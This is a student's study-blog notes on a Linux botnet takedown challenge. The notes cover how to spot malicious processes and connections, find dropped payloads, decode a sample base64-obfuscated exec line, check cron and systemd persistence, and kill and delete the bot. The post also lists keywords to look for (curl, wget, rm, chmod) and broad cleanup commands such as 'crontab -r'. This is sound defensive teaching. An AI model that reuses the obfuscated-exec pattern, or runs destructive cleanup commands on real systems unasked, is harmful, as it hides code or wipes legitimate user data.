Botnet Takedown

2025. 3. 22. 12:43·Study Record/Cybersecurity
목차
  1. 1. Botnet Takedown Challenge
  2. 2. Botnet?
  3. 3. What is a C2 (Command & Control)?
  4. 4. Files and Directories to Investigate
  5. 5. Path
  6. 1) Detect the Bot
  7. 2) Find the Malware File
  8. 3) Analyze the Malware
  9. 4) Check for Obfuscation or Encoding
  10. 4) Trace Persistence
  11. 5) Take It Down

1. Botnet Takedown Challenge

- Investigate the infected machine, identify IOCs (Indicators of Compromise), find the malware or script, determine how it works, and neutralize the botnet connection.

 

2. Botnet?

- A botnet is a network of infected computers (bots) controlled by a central attacker (botmaster).

- These bots may receive commands via C2, IRC servers, Web requests, Reverse Shells

 

3. What is a C2 (Command & Control)?

- A C2 server is what the malware connects back to

- like HQ for the bots

 

4. Files and Directories to Investigate

- /tmp/, /var/tmp/, /dev/shm/  : often used to malware to store payloads

- /etc/cron* : persistent scheduled execution

- ~/.bashrc, ~/.profile : startup scripts

- /etc/systemd/system/ : malicious services may be installed

 

5. Path

1) Detect the Bot

(1) ps aux

Lists all running processes on the system in a snapshot view.

static snapshot

- a : show processes for all users, not just you

- u : show user/owner of the process

- x : show processes not attached to a terminal (like background daemons or malware)

(2) top

Shows live, real-time process activity -like Task Manager in terminal form

Great for spotting malware using lots of CPU or RAM.

Live performance info

top

- q : quit

- k : kill a process (enter PID)

- P : sort by CPU

- M : sort by memory

(3) netstat -tulnp

Shows network connections and listening ports

- t : TCP connections only

- u : UDP connections only

- l : show listening ports (services waiting for connections)

- n : show numeric IPs/ports (instead of resolving names)

- p : show the PID/program name using the port

sudo netstat -tulnp

(4) ss -tulnp

A faster, modern alternative to netstat

(5) sudo lsof -i 

LiSt all Open Files that are network-related

- I : internet-related files. It show any process that is connected to an IP address, is listening on a port, is using TCP or UDP

sudo lsof -i

 

- Look for weird external IPs, strange ports like 1337, 6667, 8080, etc.

 

2) Find the Malware File

ls -lah /tmp /var/tmp /dev/shm

- a : show hidden files

- h : human-readable sizes

(1) Find hidden files (.*) anywhere on the system

find / -type f -iname ".*" 2>/dev/null

(2) Find recent files modified in the last 60 minutes

find / -type f -mmin -60 2>/dev/null

 

- you can use this to catch recently dropped payloads

(3) use file to see if it's a script or ELF binary

- ELF : Executable and Linkable Format. The standard binary format for linux executables

- If you see an unknown file is ELF, it's likely a compiled executable (possibly malicious)

 

Python script -> readable and easy to analyze

ELF 64-bit executable -> compiled malware (harder, needs strings, Ghidra, etc.)

3) Analyze the Malware

- If it's a script:

cat suspicious.sh

 

- If it's an ELF binary:

strings suspicious_elf | less

 

Check if it contains:

- C2 IP or domain

- commands like curl, wget, rm, chmod, etc.

- Python or bash code that loops or connects outward

 

4) Check for Obfuscation or Encoding

If you see things like:

exec(base64.b64decode("aW1wb3J0IG9zCg=="))

It's obfuscated. 

 

(1) Decode Base64 in terminal

echo "aW1wb3J0IG9zCg==" | base64 -d

 

4) Trace Persistence

(1) check crontab

crontab -l
cat /etc/crontab
ls -l /etc/cron.*/*

- l : Lists the cron jobs for the current user

(2) Check systems

systemctl list-units --type=service | grep suspicious

(3) Look at user .bashrc or .profile

- .bashrc : A hidden config file in a user's home directory. It runs every time you open a terminal.

cat ~/.bashrc

 

5) Take It Down

Once you find the malware and know how it connects

(1) Kill the process

sudo kill -9 <pid>

(2) Delete the file

sudo rm -f /tmp/bot.sh

(3) Remove from persistence

- r : Deletes all cron jobs for the current user

sudo crontab -r

 

  1. 1. Botnet Takedown Challenge
  2. 2. Botnet?
  3. 3. What is a C2 (Command & Control)?
  4. 4. Files and Directories to Investigate
  5. 5. Path
  6. 1) Detect the Bot
  7. 2) Find the Malware File
  8. 3) Analyze the Malware
  9. 4) Check for Obfuscation or Encoding
  10. 4) Trace Persistence
  11. 5) Take It Down
'Study Record/Cybersecurity' 카테고리의 다른 글
  • HTTPS Security: Nginx
  • Reverse Engineering
  • PowerShell Payloads & Fileless Execution
  • PowerShell Forensics & Execution Tracing
Sungyeon Kim
Sungyeon Kim
goldstaryeon@sookmyung.ac.kr
Sungyeon Kim
Sungyeon Kim
Sungyeon Kim
전체
오늘
어제
  • 분류 전체보기 (617)
    • Paper Review (30)
    • Research Record (9)
    • Study Record (143)
      • Cybersecurity (79)
      • AI Data Science (28)
      • Computer Science (24)
      • Linear Algebra (6)
      • SQL (5)
      • LaTeX (1)
    • English Transcription (260)
    • 한글 필사 (99)
    • 날것 그대로의 생각들 (72)

인기 글

최근 댓글

최근 글

hELLO· Designed By정상우.v4.5.3
Sungyeon Kim
Botnet Takedown
상단으로

티스토리툴바

단축키

내 블로그

내 블로그 - 관리자 홈 전환
Q
Q
새 글 쓰기
W
W

블로그 게시글

글 수정 (권한 있는 경우)
E
E
댓글 영역으로 이동
C
C

모든 영역

이 페이지의 URL 복사
S
S
맨 위로 이동
T
T
티스토리 홈 이동
H
H
단축키 안내
Shift + /
⇧ + /

* 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.